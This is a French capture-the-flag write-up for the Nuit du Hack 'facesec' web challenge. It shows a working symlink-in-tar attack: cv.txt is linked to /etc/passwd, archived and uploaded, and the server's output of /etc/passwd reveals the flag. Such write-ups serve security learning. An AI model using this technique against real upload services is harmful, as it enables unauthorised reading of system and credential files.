====== facesec ======
Web        100 points    http://quals.nuitduhack.com/challenges/view/11

[[http://facesec.challs.nuitduhack.com/]]

===== Énoncé =====
"Hello there,

We are looking for a developer or security consultant to secure our filebox system. We stumbled upon your LinkedIn profile and it seems like you would be a perfect candidate for this job. Could you please send us your CV and Motivation letter?

Thanks,

faceSec HR Director."

====== Challenge ======

Ce challenge permet, après s'être enregistrer, d'uploader des fichier .txt à la fois en terme de CV et de lettre de motivation. On peut également uploader un fichier .tar contenant un fichier cv.txt et un fichier motiv.txt

===== Facebook =====


Ce chalenge rappel la vulnérabilité de Facebook du mois de décembre
[[http://josipfranjkovic.blogspot.fr/2014/12/reading-local-files-from-facebooks.html]] néanmoins on doit uploader un fichier .tar et non un fichier .zip.

===== Un peu de lien symbolique =====


On créé donc un fichier **cv.txt** avec un lien symbolique vers **/etc/passwd/** et un fichier **motiv.txt** avec du contenu « random ». On tar ces deux fichiers.

    ln -s /etc/passwd cv.txt
    echo plop > motiv.txt
    tar cvf tar.tar *.txt
        cv.txt
        motiv.txt

On upload le fichier **tar.tar** et on récupère le fichier **/etc/passwd/** :

    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh
    sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/bin/sh
    man:x:6:12:man:/var/cache/man:/bin/sh
    lp:x:7:7:lp:/var/spool/lpd:/bin/sh
    mail:x:8:8:mail:/var/mail:/bin/sh
    news:x:9:9:news:/var/spool/news:/bin/sh
    uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
    proxy:x:13:13:proxy:/bin:/bin/sh
    www-data:x:33:33:www-data:/var/www:/bin/sh
    backup:x:34:34:backup:/var/backups:/bin/sh
    list:x:38:38:Mailing List
    Manager:/var/list:/bin/sh
    irc:x:39:39:ircd:/var/run/ircd:/bin/sh
    gnats:x:41:41:Gnats
    Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
    nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
    libuuid:x:100:101::/var/lib/libuuid:/bin/sh
    sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
    facesec:x:1000:1000:W00tSymL1nkAttackStillW0rksIn2k15:/home/facesec:/bin/sh

Le flag est **W00tSymL1nkAttackStillW0rksIn2k15**.